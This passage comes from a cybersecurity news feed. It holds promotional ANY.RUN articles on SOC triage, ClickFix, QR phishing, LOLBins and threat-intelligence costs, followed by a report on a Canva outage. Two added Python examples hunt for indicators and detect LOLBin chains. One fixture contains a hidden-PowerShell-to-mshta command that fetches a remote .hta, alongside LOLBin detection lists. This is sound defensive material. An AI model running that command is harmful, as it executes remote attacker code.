  • Indicator of established compromise, not initial infection 

RegistryKey:"Software\\Microsoft\\update" and threatLevel:"malicious" 

Search for malware that modifies registry 
Immediate Action: Escalate immediately to incident response team, scan affected hosts for additional IOCs associated with notorious stealers, and check for lateral movement indicators across your environment. 

Why It Matters: If you’re seeing persistence mechanisms, the attacker has already established a foothold. This isn’t prevention, it’s containment. Context tells you this is a critical escalation requiring full IR protocols, not just endpoint remediation. 
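Tactics 1, 3 and 5 each end with the same retroactive step: take the confirmed indicator and sweep your own telemetry for it. The following Python example, added here and not part of the article or of ANY.RUN's tooling, does that sweep offline over a constructed proxy log and a constructed set of registry-modification events, using the indicators from those three tactics. It refangs the bracketed notation, matches subdomains of a blocked domain without matching look-alikes, matches registry paths by whole key segments, and ranks hosts by hit count so the analyst knows where to start.

```python
import ipaddress
import re
from collections import Counter

# Indicators from Tactics 1, 3 and 5 above, written defanged the way they
# arrive from a feed or a report.
RAW_IOCS = {
    "domain": ["logrecovery[.]com"],
    "ip": ["45.155.205[.]11"],
    "registry": [r"Software\Microsoft\update"],
}

# Constructed proxy log (timestamp, client, method, URL, status); not real traffic.
PROXY_LOG = """\
2025-10-14T09:12:01Z 10.0.4.21 GET https://update.vendor-example.com/manifest.json 200
2025-10-14T09:13:44Z 10.0.4.21 POST http://cdn.logrecovery.com/api/upload 200
2025-10-14T09:15:02Z 10.0.7.9 GET https://intranet.example.local/ 200
2025-10-14T09:16:30Z 10.0.7.9 CONNECT 45.155.205.11:443 200
2025-10-14T09:17:15Z 10.0.4.21 GET https://notlogrecovery.com/ 200
"""

# Constructed registry-set events, shaped like parsed Sysmon Event ID 13 records.
REGISTRY_EVENTS = [
    {"host": "WS-0142", "image": r"C:\Users\a\AppData\Local\Temp\svc.exe",
     "target": r"HKCU\Software\Microsoft\update\Run"},
    {"host": "WS-0190", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"host": "WS-0201", "image": r"C:\Program Files\Vendor\Updater.exe",
     "target": r"HKCU\Software\Microsoft\Updater\Settings"},
]


def refang(value):
    """Undo the common defanging conventions so indicators compare cleanly."""
    return value.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


def load_iocs(raw):
    """Normalise every indicator once: refang, lowercase, split registry paths."""
    return {
        "domain": {refang(d).lower().rstrip(".") for d in raw["domain"]},
        "ip": {refang(i) for i in raw["ip"]},
        "registry": {tuple(k.replace("/", "\\").lower().strip("\\").split("\\"))
                     for k in raw["registry"]},
    }


def host_of(url):
    """Host part of a URL or host:port string, without scheme, port or path."""
    h = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url.strip(), flags=re.IGNORECASE)
    h = h.split("/", 1)[0].split("?", 1)[0].rsplit("@", 1)[-1]
    h = re.sub(r":\d+$", "", h)
    return h.lower().rstrip(".")


def domain_matches(host, domain):
    """Exact or subdomain match; 'notlogrecovery.com' must not match."""
    return host == domain or host.endswith("." + domain)


def hunt_proxy(log_text, iocs):
    """Return one hit per log line whose destination is a known-bad IP or domain."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, url, _status = parts[:5]
        host = host_of(url)
        try:
            ipaddress.ip_address(host)
            kind, matched = "ip", (host if host in iocs["ip"] else None)
        except ValueError:
            kind = "domain"
            matched = next((d for d in iocs["domain"] if domain_matches(host, d)), None)
        if matched:
            hits.append({"host": client, "type": kind, "indicator": matched,
                         "evidence": f"{ts} {url}"})
    return hits


def _has_segments(path_segments, ioc_segments):
    """True if the IOC's key segments appear contiguously in the path."""
    n = len(ioc_segments)
    return any(tuple(path_segments[i:i + n]) == ioc_segments
               for i in range(len(path_segments) - n + 1))


def hunt_registry(events, iocs):
    """Return one hit per event whose target key contains a known-bad path."""
    hits = []
    for ev in events:
        segs = ev["target"].replace("/", "\\").lower().strip("\\").split("\\")
        for ioc in iocs["registry"]:
            if _has_segments(segs, ioc):
                hits.append({"host": ev["host"], "type": "registry",
                             "indicator": "\\".join(ioc),
                             "evidence": f'{ev["image"]} -> {ev["target"]}'})
    return hits


def summarize(hits):
    """Hosts ordered by hit count, the list an analyst works top-down."""
    counts = Counter(h["host"] for h in hits)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    iocs = load_iocs(RAW_IOCS)
    found = hunt_proxy(PROXY_LOG, iocs) + hunt_registry(REGISTRY_EVENTS, iocs)
    for hit in found:
        print(hit)
    print(summarize(found))
```

The segment-wise registry match is what keeps the near-miss Updater key out of the results, and the dot-prefixed domain match is what keeps notlogrecovery.com out; both are the kind of false positive a plain substring search produces in a real hunt.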

The Context Advantage: From Hours to Minutes 

Each of these scenarios represents a fork in the road for a SOC analyst. Without context, you’re stuck in investigation mode: chasing down leads, correlating data points, and hoping you make the right call. With context, you skip directly to response. 

Consider the time savings: 

  • Manual TI gathering: 20-45 minutes per artifact across multiple platforms 
  • TI Lookup with context: Seconds to retrieve comprehensive intelligence 
  • Decision confidence: Immediate clarity on threat severity and appropriate response 

For a SOC analyst triaging 50+ alerts per day, that’s the difference between constantly playing catch-up and staying ahead of threats. 

How Threat Intelligence Delivers Context Automatically 

TI Lookup doesn’t just tell you whether an artifact is malicious, it shows you the full picture: 

  • Sandbox execution history: See how the artifact behaves in real, interactive malware analysis sessions 
  • Associated campaigns: Understand which threat actors and malware families use this indicator 
  • Infrastructure relationships: Map connections between domains, IPs, and file hashes 
  • Temporal context: Know if this is an emerging threat or part of an established campaign 

Instead of piecing together intelligence from multiple sources, you get a unified view that connects artifacts to actual malware behavior.  

Start Making Context-Driven Decisions Today 

Next time an alert hits your queue, ask yourself: do you have the context to act confidently, or are you about to spend the next thirty minutes hunting for it? 

Context isn’t a luxury for SOC analysts. It’s the difference between reactive scrambling and proactive defense. The threats are already using automation and infrastructure at scale. Your intelligence should, too. 

Ready to add context to your threat hunting workflow? Explore ANY.RUN’s TI Lookup and see how instant threat intelligence transforms the way you analyze and respond to security alerts. 

Speed without guessing, confidence without over-triaging. Choose a threat intelligence trial option for your SOC.

Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses https://cybersecuritynews.com/emerging-cyber-threats/ Wed, 29 Oct 2025 18:16:57 +0000

Cybersecurity experts at ANY.RUN recently unveiled alarming trends in how attackers are exploiting everyday technologies to bypass security operations centers (SOCs).

They dissected tactics like QR code phishing, ClickFix social engineering, and Living Off the Land Binaries (LOLBins), showing how these methods evade traditional defenses.

As threats grow more sophisticated, SOC teams face mounting pressure to adapt, with low detection rates risking severe breaches. Drawing from analyses of real-world samples, the session emphasized interactive tools and real-time intelligence as vital countermeasures.

ClickFix Attacks: Mastering Human Deception

ClickFix attacks stand out for their reliance on user interaction, turning routine verifications into malware gateways. Attackers send phishing emails mimicking trusted sites, like booking platforms, complete with fake CAPTCHAs.

Once a victim clicks, a malicious PowerShell script hijacks the clipboard unnoticed, prompting the user to paste and execute it via a system dialog.

This multi-stage ploy thrives on deception: double spoofing creates convincing replicas, while manual steps foil automated scanners.

Sandbox analyses reveal how execution deploys stealers like Lumma or AsyncRAT, plus ransomware, establishing persistence through startup files.

Traditional tools falter at CAPTCHAs, but interactive sandboxes simulate human actions, exposing the full chain from initial click to payload delivery in seconds.

Without such capabilities, SOCs miss threats that blend seamlessly into user workflows, leading to credential theft and system compromise.

PhishKit Attacks: QR Codes as Stealth Vectors

Phishing kits, or phishkits, have evolved into dark web staples, empowering novices to launch pro-level campaigns against giants like Microsoft and Google.

The latest twist integrates QR codes into PDF attachments disguised as DocuSign docs, directing scans to mobile devices where phishing cues hide on small screens.

These kits incorporate AI-generated lures, multi-stage checks, and CAPTCHAs like Cloudflare Turnstile, culminating in fake login pages for credential harvesting.

ANY.RUN’s automated detonation extracts QR links, solves challenges, and traces the kill chain, revealing ties to groups like Storm-1747.

Many defenses overlook QR content, allowing evasion, but advanced sandboxes handle this autonomously, cutting Tier 1 workloads by 20%. As phishkits proliferate, targeting regions via localized lures, SOCs must prioritize QR scanning to curb widespread campaigns.

LOLBins: Weaponizing Trusted Tools

LOLBins exploit Windows’ own utilities (PowerShell, mshta.exe, and cmd.exe) to mask malice as routine operations. A phishing .lnk file might invoke mshta via PowerShell to fetch payloads from remote servers, downloading decoy PDFs to obscure the real stealer, like DeerStealer.

This “living off the land” approach evades whitelists and antivirus software by mimicking admin tasks, leaving faint forensic traces.

Behavioral analysis in sandboxes uncovers connections to C2 servers and persistence mechanisms, distinguishing abuse from legitimacy.

Without context from global investigations, alerts trigger false positives. Threat intelligence feeds, pulling fresh IOCs from thousands of sessions, enable real-time blocking, slashing response times.
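The process chain described in this section (a shortcut starting a hidden PowerShell, which hands a remote .hta to mshta) is exactly the kind of parent/child relationship behavioral detection keys on. The following Python example is added here, not code from ANY.RUN or the presentation, and runs two such rules over a constructed set of process-creation events shaped like parsed Sysmon Event ID 1 records. The hosts, PIDs, paths and the 198.51.100.23 documentation address are all made up for the example; the benign look-alikes at the end show where the rules deliberately stay quiet.

```python
import re

# Constructed process-creation events, shaped like parsed Sysmon Event ID 1
# records (host, pid, ppid, image, command line). None of this is real telemetry;
# 198.51.100.23 is a documentation address standing in for a staging server.
EVENTS = [
    {"host": "WS-07", "pid": 900, "ppid": 4,
     "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"host": "WS-07", "pid": 2200, "ppid": 900,
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"host": "WS-07", "pid": 4120, "ppid": 3310,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # The chain from the section above: a shortcut launches a hidden PowerShell,
    # which hands a remote .hta to mshta.
    {"host": "WS-07", "pid": 5004, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "mshta http://198.51.100.23/stage.hta"'},
    {"host": "WS-07", "pid": 5120, "ppid": 5004,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.23/stage.hta"},
    # Benign look-alikes that must not alert: a scheduled inventory script, and
    # a vendor installer's local .hta opened from the desktop.
    {"host": "WS-07", "pid": 6001, "ppid": 2200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"host": "WS-07", "pid": 6100, "ppid": 4120,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

# Well-known living-off-the-land binaries and the script hosts that drive them.
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
           "bitsadmin.exe", "wscript.exe", "cscript.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
USER_SHELLS = {"explorer.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# -w hidden / -WindowStyle hidden / -e / -enc / -EncodedCommand
HIDDEN_FLAGS = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|enc(?:odedcommand)?|e)\b", re.IGNORECASE)


def _base(image):
    """Lowercased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def detect_lolbin_chains(events):
    """Return alerts for (a) a LOLBin spawned by a script host with a remote URL
    on its command line and (b) a hidden or encoded PowerShell started directly
    from the user's shell, the shape of a .lnk-delivered loader."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get((e["host"], e["ppid"]))
        child = _base(e["image"])
        pname = _base(parent["image"]) if parent else ""
        cmd = e["cmdline"]
        url = REMOTE_URL.search(cmd)
        if child in LOLBINS and pname in SCRIPT_HOSTS and url:
            alerts.append({"host": e["host"], "pid": e["pid"],
                           "rule": "lolbin-remote-fetch",
                           "chain": f"{pname} -> {child}",
                           "url": url.group().rstrip("\"'")})
        if child in {"powershell.exe", "pwsh.exe"} and pname in USER_SHELLS \
                and HIDDEN_FLAGS.search(cmd):
            alerts.append({"host": e["host"], "pid": e["pid"],
                           "rule": "hidden-powershell-from-explorer",
                           "chain": f"{pname} -> {child}", "url": None})
    return alerts


if __name__ == "__main__":
    for alert in detect_lolbin_chains(EVENTS):
        print(alert)
```

Neither rule looks at file hashes or signatures, which is the point: mshta.exe and powershell.exe are legitimate, signed binaries, so only the combination of who started them and what they were told to fetch separates the phishing chain from the vendor installer and the scheduled script.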

The tactics these threats employ, from ClickFix’s reliance on user interaction to QR obfuscation and LOLBin stealth, highlight the limitations of relying solely on automation.

ANY.RUN’s solutions, which combine interactive analysis with shared intelligence, enhance detection rates by 88% in under a minute and reduce mean time to resolve (MTTR) by 21 minutes.

Security Operations Centers (SOCs) that implement these solutions report a 30% decrease in escalations and a tripling of efficiency, thereby strengthening their defenses against an increasingly relentless adversary landscape.

Enhance your SOC Performance With Interactive Sandbox Threat Intelligence Lookup and Feeds => Try Now

SOCs Have a Quishing Problem: Here’s How to Solve It https://cybersecuritynews.com/socs-have-a-quishing-problem/ Wed, 22 Oct 2025 16:55:22 +0000

QR codes used to be harmless; now they’re one of the sneakiest ways attackers slip past defenses. Quishing, or QR code phishing, hides malicious links inside innocent-looking images that filters can’t read. 

One scan, and the victim lands on a fake login page designed to steal credentials or trigger a download, often from a mobile device completely outside your SOC’s visibility. 

Why Quishing Is Hard to Catch 

From a detection standpoint, Quishing breaks the usual rules. The phishing payload isn’t in the email body or attachment, it’s embedded inside an image as a QR code. That means: 

  • No clickable links for secure email gateways or URL filters to analyze. 
  • No obvious indicators for content inspection or heuristic engines. 
  • No telemetry once the user scans the code on a mobile device outside the corporate network. 

Analyst’s New Weapon: Expose QR Phishing in Seconds 

For SOC analysts, Quishing is a time sink and a blind spot. Traditional tools can’t scan QR codes and decoding them manually is slow and risky. 

That’s why many teams now rely on interactive sandboxes like ANY.RUN to safely expose what’s hidden behind those codes without leaving the protected environment. 

Instead of extracting images or using external decoders, the sandbox automatically detects and decodes QR codes from emails, PDFs, and screenshots. 

It follows the resulting link in an isolated VM, giving analysts the full attack context, from payload delivery to network activity, in just seconds. 

Real-World Example: Voicemail Scam Exposed in Under 60 Seconds 

An email arrives claiming you’ve missed a voicemail. Instead of a link, it contains a QR code urging the user to “listen to the message.” 

ANY.RUN sandbox exposing the malicious URL in seconds

Once uploaded to ANY.RUN, the sandbox automatically detects and decodes the QR without manual extraction or third-party tools.  

Reveal complex threats in seconds inside ANY.RUN’s interactive sandbox, cutting investigation time and turning hidden attacks into clear evidence -> Join ANY.RUN now 

The decoded URL is displayed immediately in the Static Discovering section, and automated interactivity triggers a controlled browser session. 

Malicious URL discovered in the Static discovering section inside ANY.RUN sandbox 

In 60 seconds, the sandbox discovered the full attack chain, surfacing relevant TTPs, exportable IOCs, network connections, and a shareable analysis report analysts can use to block, hunt, and write detections. 

Well-structured report generated by ANY.RUN for easy sharing 

Why SOC Analysts Choose ANY.RUN for Quishing Analysis 

Quishing attacks are built to waste analyst time; ANY.RUN gives that time back. With automated QR detection, real-time interaction, and deep visibility, analysts can shift from manual decoding to instant validation. 

  • 90% of attacks exposed in under 60 seconds: The sandbox reveals hidden payloads, redirect chains, and credential-harvesting pages in seconds, cutting average triage time by more than half. 
  • Full visibility in one interface: Analysts see process trees, network traffic, and decoded URLs together; no switching between tools, no risk of missing a step. 
  • Automatic evidence collection: Every session generates IOCs, network indicators, and screenshots that can be exported or shared in a single click. 
  • Faster detection engineering: Verified TTPs and IOCs can be turned into new detection rules directly from the sandbox report. 
  • Safe handling environment: QR codes, phishing pages, and scripts execute only inside the isolated VM; analysts stay fully protected while observing real behavior. 
  • Collaborative workflows: Share sessions across the team or integrate with your SIEM, SOAR, or ticketing system to accelerate incident response. 

Turn QR Phishing from a Blind Spot Into a 60-Second Investigation 

Quishing tests not only your defenses but also your efficiency. Analysts spend hours decoding images, validating links, and correlating telemetry that should already be visible. 

ANY.RUN changes that balance, giving SOCs the kind of context they can act on instantly. 

With automation built into every stage of analysis, SOC teams using ANY.RUN report measurable results: 

  • Up to 58% more threats identified overall, including those that bypass standard filters and static analysis. 
  • 94% of users report faster triage, thanks to automated IOC collection and ready-to-share reports. 
  • 95% of SOC teams speed up investigations, connecting decoded URLs, network traffic, and threat behavior in one workflow. 

Try ANY.RUN to uncover hidden phishing payloads, decode QR attacks safely, and turn every investigation into actionable insight. 

How Threat Intelligence Can Save Money and Resources for Businesses https://cybersecuritynews.com/threat-intelligence-for-businesses/ Tue, 21 Oct 2025 18:05:26 +0000

Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.

Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.

Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.

Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.

Five Strategies for Cost Savings with Threat Intelligence

TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

Preventing Breaches Proactively

Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

Platforms such as ANY.RUN provide 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.

Eliminating False Positive Waste

TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.

Cutting Labor Costs Through Automated Triage

Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.

Accelerating Response to Limit Damage

TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs (up to $100,000 per hour) and prevents revenue loss from prolonged incidents.

Maintaining Up-to-Date Defenses Effortlessly

Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.

TI also eliminates false positive waste by filtering alerts down to verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing the alert fatigue that plagues teams.

Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.

Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.

Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.

An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.

Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.

Build Stronger Security With Fresh TI Data From 500,000 Analysts => Try Now

Canva Down – Suffers Global Outage, Leaving Millions of Users Unable to Access Platform https://cybersecuritynews.com/canva-down/ Mon, 20 Oct 2025 08:59:36 +0000

Canva, the popular graphic design platform, is reeling from a widespread outage that has rendered its services inaccessible to millions of users worldwide. As of 19:16 AEDT (02:46 IST), the platform’s status page reports “significantly increased error rates” impacting nearly all functionalities, with no clear timeline for restoration.

The disruption, linked to a broader Amazon Web Services (AWS) failure, has sparked frustration among users from India to the U.S., halting workflows for marketers, designers, and educators.

A Platform in Paralysis

The outage began escalating around 18:14 AEDT (03:44 IST), with Canva’s status updates confirming “Major Outage” across critical features: login, editing, saving, downloading, and sharing designs.

Mobile apps (iOS and Android), desktop versions (macOS and Windows), and integrations like Google Classroom and Moodle are also down. Even the Canva AI Connector, Apps SDK, and billing systems are affected, leaving users unable to access projects or seek support.

DownDetector has recorded over 15,000 user complaints in recent hours, with 20% citing server connection issues and 17% reporting app failures.

In India, where Canva is a go-to for festive graphics like Diwali campaigns, users expressed dismay on X: “Canva is down completely, app and web versions. Can’t log in,” one user posted. Another from the Philippines noted, “Netizens are reporting that they cannot access Canva this Monday.”

AWS at the Core

The root cause appears to be a failure in AWS’s US-EAST-1 region, where elevated error rates and latency were reported starting around 03:11 AM ET (12:41 IST).

Canva, heavily reliant on AWS’s cloud infrastructure, is among several platforms affected, though the impact on its 220 million monthly active users is particularly acute.

“Our team is actively investigating and working to restore full access as quickly as possible,” Canva’s status page states, a message unchanged since the initial alert.

On X, #CanvaDown is trending as users vent and share memes about stalled projects. A U.S. marketer tweeted, “Was supposed to launch promo campaigns… Canva down, chaos!” An Indian agency head added, “@canva what is happening? It is a critical day!” The outage’s timing is especially painful for small businesses and freelancers, with one user estimating thousands in lost productivity.

This marks Canva’s second major outage in six months, highlighting the risks of cloud-based platforms. As users wait for updates, the incident underscores the fragility of digital workflows. Canva advises checking its status page for progress, but for now, designers worldwide are left refreshing tabs and hoping for a swift fix. Updates will follow as more details emerge.

